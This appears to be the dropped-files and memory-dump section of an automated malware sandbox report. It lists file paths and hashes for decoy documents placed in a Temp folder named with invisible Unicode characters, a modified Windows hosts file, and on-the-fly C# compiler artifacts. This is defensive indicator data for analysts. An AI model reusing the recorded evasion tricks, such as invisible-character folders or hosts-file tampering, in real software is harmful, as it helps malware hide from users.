b465360bd198a6ddfa13e30d36e46fa959d927ec4058ecb5f616cfe6215ec525e1dd151cd3c38c56387178041d2350a1e3d6d6c7e4d49e20fee62971f97aa847

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Desktop\GrantRedo.mp3

Filesize
218KB

MD5
3580db78452431eabf0e6092c1fc9007

SHA1
d257f1e47cf4242511cff302b754ced585f4e4f4

SHA256
6881827bae6948c8250422debfff9a22cadb6122ba6961fc7b15d17468e956df

SHA512
d37ff92f0f038c5b1a0f2bdf14920c8f9b0ec1e519ccc86462cd288e1c7b9f2311d70493ed19ee12d93d46f0f5f2c98ddcf19c92e14355626ccdbcec0a6eedf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Documents\RedoShow.docx

Filesize
14KB

MD5
bb55fcc16d92a054b7c999968b4f04b5

SHA1
70fab6e334187a3161766737e9801d1fd69e787d

SHA256
67afbf08384816f5cb0b624cb5f75e7db51d8c227d9e974cc56e08a06f1a4b5b

SHA512
d77f3c6801a091e1ff9edb05905642cf001429513ec4781c7ccd8b22c6ea514c6b563263d0d991528beb78a467dff878b135b3c8adb55efb8deda07276e1a2d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Documents\TestUninstall.xls

Filesize
1.1MB

MD5
84db63c69c2d92e6583909348d1a4ff7

SHA1
c0d193162b8ae6b31d7ec548bf14ad71c0e1f534

SHA256
b5e5812147dbaa29b5ec965fd0e39b4b58f7220382f87291dcc52c60bc776e5a

SHA512
048b1c4462c7a4c4f2842499fa2858739171f65a4a507a6f4e47aa11af626143d7ca5106b2e16a91c1884396dc3e976514fd1d602e44513b64ad6a72e679e52c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Documents\UnprotectSkip.docx

Filesize
13KB

MD5
35bfb10c7b144cc3bf887e07945f3fb8

SHA1
d7b4f1a596e321f7bc6d30390c0804d0f260b8f0

SHA256
87b8e8706a89dd71cda7d891bf1db74c7e971c5303ff32b00b2e4a713cc34b06

SHA512
1df65fc63bbe06b4050b2dfc1a641276407e13c347b3a3a70f00b16aee28644dddb376b1a048600bdde7e3be80a0d307d7485cee14dd843aef5a8c070e294533

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Documents\UpdateShow.docx

Filesize
13KB

MD5
dd5bf8a907ce9874c93acc6eb8a06cfc

SHA1
af5cbf40e54900d3f380d480601045e3801a537a

SHA256
337d30b19f25e86779f4dbca6437d497a85e5b0d7a5b3975d569cac788ba86ef

SHA512
5dd45a6353067e2cc7e8039853c09ed01052ff4f4ac09688e6ff2da2c32ab87904f9865058142293b3b8bc3a6509cc4181f028710bc3902e9586ad9b011bc0ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Downloads\BlockRename.docx

Filesize
641KB

MD5
24243722552ab36868f280adb8dbdd1f

SHA1
ae745d631e72aa95afae39393f4662d1e44256bb

SHA256
2a66b5d2f41ea4b89d224b0b552601e47938b0179601219f447ac1bccef83931

SHA512
48758edf4a2a78b00f46c784f1f09a0be29a5f330281d0449ad8ec1bc1ccfdbb904672d4bf4eab27d59234105b62b4a9bb722479fca3d13a50d673f9aad4644b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Downloads\DismountSync.xls

Filesize
707KB

MD5
8ea257bda1268ec72310fcb3b98fd3b8

SHA1
c42f2a3978ca7f3eb572bcadf4bcb7f42053f47d

SHA256
dcb50539a08113f1a0893f732e2ed3f42eed1ae74994e0b9026480789a8d2f4e

SHA512
66068b7394aca4284d59132dc1accde7ce41f59d530bc1961bc68ffaab5b7e1d1e5f8528562b50f59704c7832d2d49620f1c69bad25ed02c0ef5ccf0c12ef99f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Downloads\GrantCheckpoint.docx

Filesize
774KB

MD5
b830fb924be1c911909596249f5f22b1

SHA1
33387d0406a528d86594ab4880d907ffd4093b74

SHA256
38d332910ae1eb1d1471cc4900ec56314b957615e791e0bdf392b4bec925e5fb

SHA512
f804ac2939d0e9a3156ada89bafdf676da0eecb0c153978637b98842d8751df0efe1d76586dade1949a8838a6c443dc0df4544dc6c4dec9cf9e0f135e5d8133e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Music\UnlockLimit.xlsx

Filesize
367KB

MD5
adb21f156cb018ab819311b58b5dc8a6

SHA1
3c1547bfd5c603489d2a1d9287ce447323ce0646

SHA256
9cfcae71b88a3fc22fa1b067560e6cbcddb28f8a4f9e98557676e4ce342945e0

SHA512
f28931f24130f4f3ce3dc8b55930ea95328f9662b8b5b883cf72615ddbf585cc056057da241764548a49739befa708405a66eaf54037f76c5fedac5fa7620d54

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Pictures\BackupPublish.dxf

Filesize
371KB

MD5
ef008f527161112b35b65b356329ba17

SHA1
ca69c34089f4b9f952b9f3345f06d8b210af31c1

SHA256
36f34419f4a6ccca766f0e66d10d9647d615fac173dfe14599b1440a686a3ece

SHA512
ae9f01a3149f0b54b089c5143258e064b40ba105b4321bd9fdd9b424cb8c1784ad2294af15eda36afe6945f17955d70953c2817f21063793b50cfb784618e56c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‎ \Common Files\Pictures\ClearUnpublish.jpeg

Filesize
243KB

MD5
fef395fb608af65f071ac399158491db

SHA1
1d299cf9edabd402eee2a5fc28d9f1364b06460b

SHA256
d547ea5f4588277bb64658e67bb213a369563ee711d74f90877011a25f2dbeb7

SHA512
51055de01f68924bf39126e3740c93e385c3bf8ca97f2bde1e733f3ee729b6e9124ed32c518ae5cab98c260add84c29d3249c5c921fd880fd81ae264e05135ed

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2aurjloz\2aurjloz.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2aurjloz\2aurjloz.cmdline

Filesize
607B

MD5
96f83645b12ee6ede082418ac60ea721

SHA1
98431e1c5e07557894e3d5bcecb25194edbf899b

SHA256
16e7fbaae93ec3908e9d86d9349b2d908e68bfb46c8a7f0b53368b96de1bd2da

SHA512
75a83b2ebebd934828a990e470776d5179abd30d9f4a5e4468cad3f47fb0de808d5df2e9e15767cb650ceae1b124761e812baa0067c6556b7decf44fc677d8aa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2aurjloz\CSC8FCA2A7BB8414476BF12ACDD9CD152D.TMP

Filesize
652B

MD5
ea5c3e1ec675fcd7a9bbbbe167d23b03

SHA1
538bc65c6b2d58cd7f333f350cd81fc8f5a379b4

SHA256
ebb6592e3b91f082cd716b2ee900b63862229c35be4c53c0c40e6d183add9b6b

SHA512
1834f99215ff1b942afe086b6e3732650b13f265bd4a1e1bc6509ca8940697b62aaaae6bd5006d9c3b39e4e03fba42e30c06e4d4529f931635b7e36f9d2d9669

Download Submit
memory/2420-82-0x00007FFA0F0B3000-0x00007FFA0F0B5000-memory.dmp

Filesize
8KB

Download
memory/2420-83-0x00007FFA0F0B0000-0x00007FFA0FB71000-memory.dmp

Filesize
10.8MB

Download
memory/2420-182-0x00007FFA0F0B0000-0x00007FFA0FB71000-memory.dmp

Filesize
10.8MB

Download
memory/2420-85-0x0000022528910000-0x0000022528932000-memory.dmp

Filesize
136KB

Download
memory/3724-72-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp

Filesize
144KB

Download
memory/3724-137-0x00007FFA1AB50000-0x00007FFA1AB69000-memory.dmp

Filesize
100KB

Download
memory/3724-66-0x00007FFA1AB20000-0x00007FFA1AB4E000-memory.dmp

Filesize
184KB

Download
memory/3724-62-0x00007FFA1AB50000-0x00007FFA1AB69000-memory.dmp

Filesize
100KB

Download
memory/3724-310-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp

Filesize
4.4MB

Download
memory/3724-30-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp

Filesize
144KB

Download
memory/3724-32-0x00007FFA25B30000-0x00007FFA25B3F000-memory.dmp

Filesize
60KB

Download
memory/3724-244-0x00007FFA0FB80000-0x00007FFA0FEF7000-memory.dmp

Filesize
3.5MB

Download
memory/3724-25-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp

Filesize
4.4MB

Download
memory/3724-257-0x00007FFA11330000-0x00007FFA113E7000-memory.dmp

Filesize
732KB

Download
memory/3724-60-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp

Filesize
1.4MB

Download
memory/3724-58-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp

Filesize
120KB

Download
memory/3724-56-0x00007FFA200D0000-0x00007FFA200E8000-memory.dmp

Filesize
96KB

Download
memory/3724-54-0x00007FFA20430000-0x00007FFA2045C000-memory.dmp

Filesize
176KB

Download
memory/3724-174-0x00007FFA1AB20000-0x00007FFA1AB4E000-memory.dmp

Filesize
184KB

Download
memory/3724-64-0x00007FFA20690000-0x00007FFA2069D000-memory.dmp

Filesize
52KB

Download
memory/3724-71-0x00007FFA11330000-0x00007FFA113E7000-memory.dmp

Filesize
732KB

Download
memory/3724-84-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp

Filesize
1.4MB

Download
memory/3724-81-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp

Filesize
120KB

Download
memory/3724-80-0x00007FFA10640000-0x00007FFA10758000-memory.dmp

Filesize
1.1MB

Download
memory/3724-74-0x00007FFA241A0000-0x00007FFA241B5000-memory.dmp

Filesize
84KB

Download
memory/3724-76-0x00007FFA20510000-0x00007FFA2051D000-memory.dmp

Filesize
52KB

Download
memory/3724-69-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp

Filesize
4.4MB

Download
memory/3724-70-0x00007FFA0FB80000-0x00007FFA0FEF7000-memory.dmp

Filesize
3.5MB

Download
memory/3724-301-0x00007FFA103F0000-0x00007FFA10561000-memory.dmp

Filesize
1.4MB

Download
memory/3724-300-0x00007FFA200B0000-0x00007FFA200CE000-memory.dmp

Filesize
120KB

Download
memory/3724-296-0x00007FFA240F0000-0x00007FFA24114000-memory.dmp

Filesize
144KB

Download
memory/3724-295-0x00007FFA10920000-0x00007FFA10D85000-memory.dmp

Filesize
4.4MB

Download
memory/3988-213-0x00000177E8560000-0x00000177E8568000-memory.dmp

Filesize
32KB

Download